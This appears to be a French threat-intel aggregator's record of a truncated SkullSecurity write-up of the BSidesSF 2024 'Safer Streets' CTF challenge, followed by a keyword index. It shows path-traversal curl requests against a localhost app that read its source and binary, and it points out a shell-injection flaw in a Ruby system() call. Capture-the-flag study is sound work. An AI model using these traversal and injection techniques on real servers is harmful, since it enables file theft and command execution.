One Article Review
| Source |  SkullSecurity |
|---|---|
| Identifiant | 8494289 |
| Date de publication | 2024-05-05 00:00:00 (vue: 2024-05-06 00:05:44) |
| Titre | BSIDESSF 2024 Écritures: Streets plus sûrs (Web / inverse) BSidesSF 2024 Writeups: Safer Streets (Web / reversing) |
| Texte | This is a write-up for Safer Streets. I apparently wrote this in more “note to self” style, not blog style, so enjoy! First, browse the application. You should be able to create an error: $ curl \'http://localhost:8080/display?name=test\' Error in script /app/server.rb: No such file or directory @ rb_sysopen - /app/data/test Note that has a image/jpeg content-type, so it might confuse the browser. That issue grants access to two primitives: a) Read any file via path traversal b) The full path to the server For example: $ curl -s \'http://localhost:8080/display?name=../server.rb\' | head -n20 require \'json\' require \'sinatra\' require \'pp\' require \'singlogger\' require \'open3\' ::SingLogger.set_level_from_string(level: ENV[\'log_level\'] || \'debug\') LOGGER = ::SingLogger.instance() # Ideally, we set all these in the Dockerfile set :bind, ENV[\'HOST\'] || \'0.0.0.0\' set :port, ENV[\'PORT\'] || \'8080\' SAFER_STREETS_PATH = ENV[\'SAFER_STREETS\'] || \'/app/safer-streets\' SCRIPT = File.expand_path(__FILE__) LOGGER.info("Checking for required binaries...") if File.exist?(SAFER_STREETS_PATH) LOGGER.info("* Found `safer-streets` binary: #{ SAFER_STREETS_PATH }") [...] You can grab the safer-streets binary as well: $ curl -s \'http://localhost:8080/display?name=../../../app/safer-streets\' | file - /dev/stdin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=fa512a55e0fbc8c4ad80483379826183f29ce161, for GNU/Linux 3.2.0, with debug_info, not stripped Inspecting the Ruby code shows an shell-injection issue if you control the output of safer-streets: system("/usr/bin/report-infraction --node=\'#{result[\'node\']}\' --img=\'#{photo}\'") You can reverse or mess with the binary to dis |
| Envoyé | Oui |
| Condensat | +8+8 /app/data/test /app/safer /app/server /code128png /combined /dev/stdin: /exploit /home/ctf/print /lib64/ld /safer /server /tmp/flag /usr/bin/report 0123456789104 0123456789104test 0123456789104testcode128 128 176 1x2 200 2024 52d11b6dba5e 8080 ::singlogger :bind :port =fa512a55e0fbc8c4ad80483379826183f29ce161 `safer able above access actually add all also any apparently application barcode barcodes best bigger binaries binary binary: bit blog browse browser bsidessf buildid but can check checking code code128 code: codes combined concatenated confuse content continue; control create ctf curl data debug decode directory discover dockerfile dynamically ean elf enjoy env error error: example: executable exist exit expand exploit extra faulty; field: file first flag flag: found fprintf from full generated geometry get gnu/linux grab grants grayscale has have having head here hinted host http://localhost:8080/display http://localhost:8080/upload ideally image image/jpeg images img= info infraction injection inspecting instance interlaced interpreter invalid issue it: json len length level level: linked linux log logger logic looking loop lsb means mentioned mess might mogrify montage more multiple n20 name name= name=test needs next node node= non not note one open3 ourselves output outside parameter: parsing: partial path payload: photo photo=@ pie plate png png: port preview primitives: printf rb: read require required resize result reverse reversing ruby safer script self” server set sha1 shell should show shows sinatra singlogger some speed stderr strcmp streets streets: streets` string stripped style submit such sym sym; symbol sysopen system sysv technique test then these they tile traversal tried two txt txt; typ type type: unsigned upc using version web well: which will won work write writeups: wrote x200 x86 your zbar “note |
| Tags | Threat |
| Stories | |
| Notes | ★★★ |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.